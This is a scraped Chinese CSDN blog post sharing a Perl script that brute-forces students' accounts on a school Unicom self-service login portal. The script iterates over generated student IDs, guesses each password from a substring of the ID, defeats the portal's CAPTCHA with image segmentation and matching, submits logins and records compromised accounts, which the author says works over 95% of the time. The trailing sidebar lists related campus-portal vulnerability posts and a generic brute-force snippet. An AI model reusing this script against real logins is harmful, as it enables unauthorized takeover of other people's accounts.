暴力解学校联通上网密码—_—!!

最新推荐文章于 2024-07-05 08:34:11 发布
最新推荐文章于 2024-07-05 08:34:11 发布
阅读量1.5k 收藏
点赞数
分类专栏: Perl 文章标签: 实战 验证码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cike14/article/details/38471803
版权

在下菜鸟,大神请飘过委屈尴尬,学习了验证码的识别后打算实战下,以检验自己学的时候有效,就瞄向了学校的联通客服网站,验证码较为简单,没有弯曲,噪点,如下图。

经过处理后可将验证码切割为4个独立的部分,如下图:

具体实现代码,此处不再赘述,请看我以前的日志,详细介绍文章,稍加修改即可,如果有问题可私信我或加qq(422835688)。

下面看我的详细代码,

use LWP::Simple;
use LWP::Useragent;
use Imager;
use List::Util qw(max min);
use Image::Seek qw(loaddb add_image query_id savedb);
use Image::Magick;
use HTML::TableExtract;

open XH ,"<xh.txt";#生成完毕的学校学生的学号。
while(<XH>)
{
		chomp;
		my $name=$_;
		my $pass=substr($_,4,6);#此处密码可用字典。
		#print $name."	".$pass."\n";测试
		my $ua = LWP::UserAgent->new;

		$ua->agent('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36');
		$ua->cookie_jar({});
	my $res = $ua->get('http://172.xx.x.xx:8080/selfservice/common/web/verifycode.jsp');#此处是获得验证码图片(网址做了处理)
		if($res->is_success){

		
		open my$code_image,">yzm.jpg" or die "$!";
		binmode($code_image);
		print $code_image $res->content;
		#close $code_image;测试

		}


		my $file="yzm.jpg";

#切割下载的验证码
		for my $num (0..3){

					my $image = new Image::Magick;
					$image->Read($file);
					my ($w, $h,) = $image->Get('width', 'height');
					$w /= 4;
					my $xxx = $w * $num;
					
					$image->Quantize(colorspace=>'gray');
					$image->Threshold(threshold=>'50%',channel=>'All');
					$image->Crop(width=>$w, height=>$h, x=>$xxx, y=>0);
					
					$image->Write('y.jpg');
					$image = undef;
					
					my $img = new Image::Magick;
					$img->Read('y.jpg');
					my (@px_x,@px_y);
					for my $x(0..$w){
							for my $y (0..$h){
									my $px = $img -> GetPixel(x=>$x,y=>$y);
									if($px == 0){
											push @px_x,$x;
											push @px_y,$y;
									}
							}
					}

					my ($xmax,$xmin,$ymax,$ymin) = (max(@px_x),min(@px_x),max(@px_y),min(@px_y));
					my $xw = $xmax-$xmin + 2;
					my $yh = $ymax-$ymin + 2;
					$xmin -= 1;
					$ymin -= 1;

					$img->Crop(width=>$xw, height=>$yh, x=>$xmin, y=>$ymin);
					
					
					my $out = $num.'yzm1.jpg';
					$img->Write($out);

					$img = undef;
			}
#载入数据库判别数字
#数据库中的数据我是这样获得的,在图片中找到0-9的数字,分别切割,处理后存入imgdata.db数据库中
			loaddb("imgdata.db");
			$yzm="";
			for my $num (0..3){
			my $img = Imager->new();
			my $file = $num.'yzm1.jpg'; 

			$img->open(file => $file);

			add_image($img,10);
			#savedb("imgdata.db");测试

			my @results = query_id(10); 
			$yzm=$yzm.$results[1]->[0];# 识别后的验证码,存放在变量$yzm中。
			
			}
			#print $yzm."\n";测试
			
#模拟post提交,登陆,此处提交获取的验证码。
#此后的代码,要根据具体的网站反馈信息作调整
			 $res =  $ua->post(
								'http://172.16.0.13:8080/selfservice/module/scgroup/web/login_judge.jsf',
								[act=>'add',name=>"$name",password=>"$pass",verify=>"$yzm"],
										);

			if($res->content =~ /verfiyError/)
			{
				open ERROR ,">>error.txt";
				
				print ERROR $name."\n"; 
			}
			if($res->content =~ /errorMsg/)
			{
				open MM,">>mm_error.txt";
				print MM $name."\n";
				
			}
			#open FILE,">secc.html";
			#print FILE $res->content;
			if($res->content =~ /index_self.jsf?/){
			
			my $response=$ua->get('http://172.xx.x.xx:8080/selfservice/module/chargecardself/web/chargecardself_charge.jsf');
	
			open RES ,">res.html";
			print RES $response->content;
			open RES2,"<res.html";
			while(<RES2>)
			{
				chomp;
				my $line=$_;
				if($line=~ /certificateNo">(0-9)+</)
				{
				print $1."	";

				}
			}	
	
			print $name."	success\n";
			open SUCC,">>success.txt";#将获取的密码村放入文档中。
			print SUCC $name."\n";
			
			}
			
}


代码都是亲自测试过可以使用的,如果有问题就是在写文章中疏忽所致,对于这种验证码的识别,成功率在95%以上。本人水平较低,大牛们勿喷
睡觉 哭

soapIII
关注
专栏目录
锐捷校园网自助服务系统 login_judge.jsf 任意文件读取漏洞复现(XVE-2024-2116)
0xSec
06-06 818
校园网自助服务系统/selfservice/selfservice/module/scgroup/web/login_judge.jsf 接口处存在任意文件读取漏洞,经过分析和研判,该漏洞利用难度低,可导致敏感信息泄漏,建议尽快修复。
我的个人主页
XDFZ_ST_HYX的博客
07-21 3889
我的个人主页
python login
iking83的博客
12-17 2333
# -*- coding: utf-8 -*- from PIL import Image import pytesseract import urllib2 import json import cookielib import urllib import re import sys from cStringIO import StringIO def binarize_image(img):
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 1032
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
校园网密码程序
weixin_34081595的博客
10-18 2014
环境:Python 2.7#!/usr/bin/envpython #coding=utf8 print"+"*50 printu"功能:简单破校园网账号" printu"微信公众号:电脑趣事" printu"仅供学习交流使用,严禁违法犯罪,否则后果自负" print"+"*50 importhttplib importurllib importre ...
【漏洞复现】锐捷校园网自助服务系统——任意文件读取
最新发布
LongL_GuYu的博客
07-05 523
锐捷校园网自助服务系统是一个供校园内学生和教职工自助管理网络服务的系统。其`login_judge.jsf`接口存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。
校园联通网使用沃派开wifi完美破
热门推荐
天地炫舞的博客
10-28 4万+
本文原链接:http://blog.csdn.net/tiandixuanwuliang/article/details/78378443 联通校园网使用沃派作为客户端,不允许开wifi,现在提供完美决办法,欢迎大家点赞,谢谢大家的支持。 1、下载旧版“沃派客户端”,必须使用旧版本(最重要!) 下载地址:http://download.csdn.net/download/tiandixua
深信服SCSA安全工程师题库(方便大家复习备考)
a5a8a45的博客
04-11 1万+
1、【EDR】下列哪个端口是紧急情况下EDR管理平台和客户端通信端口,即紧急情况下用于下发Agent重启、Agent卸载和Agent停止等指令。( ) A:443.0 B:54120.0 C:8083.0 D:8088.0 正确答案B 2、【EDR】客户有7000个终端需要安装EDR客户端进行安全防护, 请问推荐部署多少个EDR管理平台( ) A:1个 B:2个 C:4个 D:6个 正确答案C 3、【EDR】EDR的Agent客户端不支持在以下哪种类型的终端上安装( ) A:Windows Server B
2021年网络安全学习路线指导(含视频教程)
yalin7076的博客
01-05 4447
什么是网络安全 网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。具有保密性、完整性、可用性、可控性、可审查性的特性。​(PS:网络借鉴参考,大家都懂) 网络安全工程师的定义 首先,我们来看看网络安全工程师的定义:指遵照信息安全管理体系和标准工作,防范黑客入侵并进行分析和防范,通过运用各种安全产品和技术,设置防火墙、防病毒、IDS、PKI、攻防技术等。同时进行安全制度建设与安全技术规划、日常维护管理、信息
黑客ABC
矩阵实验室
11-14 1985
0.前言本文给吃瓜群众看得,不谈技术,只是谈谈和黑客有关的一般内容,看看即可,可带瓜子,勿要笔记。1. 黑客大多数人对黑客这个词的认识是片面的,现在和这个词联系最多的是酷,牛逼,以及其它各种负面词汇。 黑客起源于20世纪50年代,MIT的技术模型铁路俱乐部(Tech Model Railroad Club,TMRC)。 “hack”一词大概很早就由MIT 的学生提出了,他们一直用这个词来形容本校
Web安全深度剖析(张柄帅)
07-25
《Web安全深度剖析》总结了当前流行的高危漏洞的形成原因、攻击手段及决方案,并通过大量的示例代码复现漏洞原型,制作模拟环境,更好地帮助读者深入了Web应用程序中存在的漏洞,防患于未然。 《Web安全深度剖析》从攻到防,从原理到实战,由浅入深、循序渐进地介绍了Web 安全体系。全书分4 篇共16 章,除介绍Web 安全的基础知识外,还介绍了Web 应用程序中最常见的安全漏洞、开源程序的攻击流程与防御,并着重分析了“拖库”事件时黑客所使用的攻击手段。此外,还介绍了渗透测试工程师其他的一些检测方式。 《Web安全深度剖析》最适合渗透测试人员、Web 开发人员、安全咨询顾问、测试人员、架构师、项目经理、设计等人员阅读,也可以作为信息安全等相关专业的教材。 第1篇 基础篇 第1章 Web安全简介 2 1.1 服务器是如何被入侵的 2 1.2 如何更好地学习Web安全 4 第2章 深入HTTP请求流程 6 2.1 HTTP协议析 6 2.1.1 发起HTTP请求 6 2.1.2 HTTP协议详 7 2.1.3 模拟HTTP请求 13 2.1.4 HTTP协议与HTTPS协议的区别 14 2.2 截取HTTP请求 15 2.2.1 Burp Suite Proxy 初体验 15 2.2.2 Fiddler 19 2.2.3 WinSock Expert 24 2.3 HTTP应用:黑帽SEO之搜索引擎劫持 24 2.4 小结 25 第3章 信息探测 26 3.1 Google Hack 26 3.1.1 搜集子域名 26 3.1.2 搜集Web信息 27 3.2 Nmap初体验 29 3.2.1 安装Nmap 29 3.2.2 探测主机信息 30 3.2.3 Nmap脚本引擎 32 3.3 DirBuster 33 3.4 指纹识别 35 3.5 小结 38 第4章 漏洞扫描 39 4.1 Burp Suite 39 4.1.1 Target 39 4.1.2 Spider 40 4.1.3 Scanner 42 4.1.4 Intruder 43 4.1.5 辅助模块 46 4.2 AWVS 49 4.2.1 WVS向导扫描 50 4.2.2 Web扫描服务 52 4.2.3 WVS小工具 53 4.3 AppScan 54 4.3.1 使用AppScan扫描 55 4.3.2 处理结果 58 4.3.3 AppScan辅助工具 58 4.4 小结 61 第2篇 原理篇 第5章 SQL注入漏洞 64 5.1 SQL注入原理 64 5.2 注入漏洞分类 66 5.2.1 数字型注入 66 5.2.2 字符型注入 67 5.2.3 SQL注入分类 68 5.3 常见数据库注入 69 5.3.1 SQL Server 69 5.3.2 MySQL 75 5.3.3 Oracle 84 5.4 注入工具 89 5.4.1 SQLMap 89 5.4.2 Pangolin 95 5.4.3 Havij 98 5.5 防止SQL注入 99 5.5.1 严格的数据类型 100 5.5.2 特殊字符转义 101 5.5.3 使用预编译语句 102 5.5.4 框架技术 103 5.5.5 存储过程 104 5.6 小结 105 第6章 上传漏洞 106 6.1 析漏洞 106 6.1.1 IIS析漏洞 106 6.1.2 Apache析漏洞 109 6.1.3 PHP CGI析漏洞 110 6.2 绕过上传漏洞 110 6.2.1 客户端检测 112 6.2.2 服务器端检测 115 6.3 文本编辑器上传漏洞 123 6.4 修复上传漏洞 127 6.5 小结 128 第7章 XSS跨站脚本漏洞 129 7.1 XSS原理析 129 7.2 XSS类型 130 7.2.1 反射型XSS 130 7.2.2 存储型XSS 131 7.2.3 DOM XSS 132 7.3 检测XSS 133 7.3.1 手工检测XSS 134 7.3.2 全自动检测XSS 134 7.4 XSS高级利用 134 7.4.1 XSS会话劫持 135 7.4.2 XSS Framework 141 7.4.3 XSS GetShell 144 7.4.3 XSS蠕虫 149 7.5 修复XSS跨站漏洞 151 7.5.1 输入与输出 151 7.5.2 HttpOnly 158 7.6 小结 160 第8章 命令执行漏洞 161 8.1 OS命令执行漏洞示例 161 8.2 命令执行模型 162 8.2.1 PHP命令执行 163 8.2.2 Java命令执行 165 8.3 框架执行漏洞 166 8.3.1 Struts2代码执行漏洞 166 8.3.2 ThinkPHP命令执行漏洞 169 8.3 防范命令执行漏洞 169 第9章 文件包含漏洞 171 9.1 包含漏洞原理析 171 9.1.1 PHP包含 171 9.1.2 JSP包含 180 9.2 安全编写包含 184 9.3 小结 184 第10章 其他漏洞 185 10.1 CSRF 185 10.1.1 CSRF攻击原理 185 10.1.2 CSRF攻击场景(GET) 186 10.1.3 CSRF攻击场景(POST) 188 10.1.4 浏览器Cookie机制 190 10.1.5 检测CSRF漏洞 193 10.1.6 预防跨站请求伪造 197 10.2 逻辑错误漏洞 199 10.2.1 挖掘逻辑漏洞 199 10.2.2 绕过授权验证 200 10.2.3 密码找回逻辑漏洞 204 10.2.4 支付逻辑漏洞 205 10.2.5 指定账户恶意攻击 209 10.3 代码注入 210 10.3.1 XML注入 211 10.3.2 XPath注入 212 10.3.3 JSON注入 215 10.3.4 HTTP Parameter Pollution 216 10.4 URL跳转与钓鱼 218 10.4.1 URL跳转 218 10.4.2 钓鱼 220 10.5 WebServer远程部署 224 10.5.1 Tomcat 224 10.5.2 JBoss 226 10.5.3 WebLogic 229 10.6 小结 233 第3篇 实战篇 第11章 实战入侵与防范 236 11.1 开源程序安全剖析 236 11.1.1 0day攻击 236 11.1.2 网站后台安全 238 11.1.3 MD5还安全吗 243 11.2 拖库 248 11.2.1 支持外连接 248 11.2.2 不支持外连接 253 11.3 小结 262 第4篇 综合篇 第12章 暴力测试 264 12.1 C/S架构破 265 12.2 B/S架构破 272 12.3 暴力案例 275 12.4 防止暴力 277 12.5 小结 278 第13章 旁注攻击 279 13.1 服务器端Web架构 279 13.2 IP逆向查询 280 13.3 SQL跨库查询 282 13.4 目录越权 283 13.5 构造注入点 284 13.6 CDN 286 13.7 小结 288 第14章 提权 290 14.1 溢出提权 290 14.2 第三方组件提权 294 14.2.1 信息搜集 294 14.2.2 数据库提权 296 14.2.3 FTP提权 302 14.2.4 PcAnywhere提权 312 14.3 虚拟主机提权 314 14.4 提权辅助 315 14.4.1 3389端口 315 14.4.2 端口转发 318 14.4.3 启动项提权 320 14.4.4 DLL劫持 321 14.4.5 添加后门 322 14.5 服务器防提权措施 324 14.6 小结 325 第15章 ARP欺骗攻击 326 15.1 ARP协议简介 326 15.1.1 ARP缓存表 326 15.1.2 局域网主机通信 327 15.1.3 ARP欺骗原理 328 15.2 ARP攻击 329 15.2.1 Cain 329 15.2.2 Ettercap 332 15.2.3 NetFuke 336 15.3 防御ARP攻击 339 15.4 小结 340 第16章 社会工程学 341 16.1 信息搜集 341 16.2 沟通 343 16.3 伪造 344 16.4 小结 345
检测锐捷认证服务器
漳州软件园二期(漳新高科)
04-29 5678
友情检测锐捷认证服务器(来自386)  1所需工具为:HTTP傻瓜服务器V1.0,非官方锐捷拨号客户端MentoHUST,JSP木马并制作war压缩包 WINHEX 。哑巴嗅探器 V3.0 j2sdk-1_4_1_01-windows-i586.rar如图1 一 确定认证服务器的地址:1如果你知道学校的自助服务的地址的话,也就是查网费的URL。打开默认锐捷拨号软件点开消
freeswitch服务器状态web端监控(可以更换为任意服务器进程)
lidedongsn
07-16 5968
首先在监控服务器上创建一个数据库monitor:mysql -h172.16.150.23 -uroot -proot create database monitor; use monitor; mysql> create table servers ( id int not null primary key auto_increment, hostname
联通校园网避免检测随身wifi方法
Prodigal
10-20 6565
@toc# 方法1、直接登陆 1、不要下载客服端登录界面 2、在win10自带的Dr.COM登录界面 3、在这里填入你的联通账户和密码 账户格式为:账户@unicom 例如你的账户是123456,那么你应该填写123456@unicom 密码不变 这样填写后,登录不用通过客户端,就不会检测出你的随身wifi了。 ...
校园网内端口扫描教程——本文献给无聊的计算机系大学生们
weixin_43039349的博客
04-14 1万+
想不想看看你们校园里里有哪些不为人知的网站或是找找开放了一些有趣端口的服务器? 首先我们需要在Linux下安装nmap(Nmap是一款网络扫描和主机检测的非常有用的工具),Ubuntu 可使用sudo apt-get install nmap安装,这个软件也有windows版本的,大家可以自行百度,下面只介绍Linux下的操作,这个应该不是什么难题。 1.安装好工具,现在我们要找到自己的ip地址。...
创建站点自助服务(Self-Service Site Creation)
SPFarmer的SharePoint专栏
10-25 1518
创建网站集(Site Collection)需要在Central Administration里创建,这需要Farm Administrator的权限。但是这个让创建Site Collection变得很不方便。 在一些大的公司,如果一个User想要创建Site Collection,就要需要给IT 部门提交申请的话,那么这个过程可能要很久。SharePoint提供了一个自助创建Site Coll
6个常见校园网认证客户端故障原因及方法
weixin_34248118的博客
11-21 2万+
故障一:本地连接打叉或受限制;客户端提示“无法获取IP信息”可能原因:1.网线虚接2.学生端网络跳线质量太差3.网卡或网卡驱动程序过久4.交换机的某个端口出现故障5.DHCP服务器故障或交换机故障(此原因只适应本栋楼的大面积故障,不适应个别故障)决办法:1.与同房间的用户互换网络端口,判断是线路问题还是电脑问题2.若是线路问题,按以下步骤执行:检查是否有虚接、检查用户端网线...
联通id2挑战字申请和服务端认证并加密接口
hch的博客
02-26 1333
以前移动,电信的设备接入都完成了,现在做联通的接入,联通的就麻烦一点,直接上图流程.       这里面完成两步: 1 设备拿id2来请求自己服务器,自己服务器拿到id2,去id2服务器获取挑战字,然后下发给设备. 2 设备拿到挑战字,生成auth_code,ID,给到自己服务器,自己生成一个密码A,然后给id2服务器,会返回一个加密字符串B,把这个B返回给设备,设备密出密码A,...
Python密码暴力
05-13
密码暴力是一种攻击方式,通常用于尝试破加密密码或访问受保护的系统。在Python中,可以使用循环或递归来创建密码暴力程序。 以下是一个简单的密码暴力程序示例,使用Python中的循环: ```python import itertools def brute_force(password): chars = 'abcdefghijklmnopqrstuvwxyz0123456789' attempts = 0 for length in range(1, len(password) + 1): for guess in itertools.product(chars, repeat=length): attempts += 1 guess = ''.join(guess) if guess == password: return (guess, attempts) return (None, attempts) password = input("Enter password to brute force: ") result, attempts = brute_force(password) if result: print(f"Password: {result} found in {attempts} attempts") else: print(f"Password not found in {attempts} attempts") ``` 该程序使用 `itertools.product` 生成所有可能的密码组合,然后循环尝试每个密码,直到找到匹配的密码或尝试完所有组合。在实际应用中,密码暴力是一种非常低效的攻击方式,因为需要尝试大量的组合,并且会被大多数系统检测到并拒绝访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值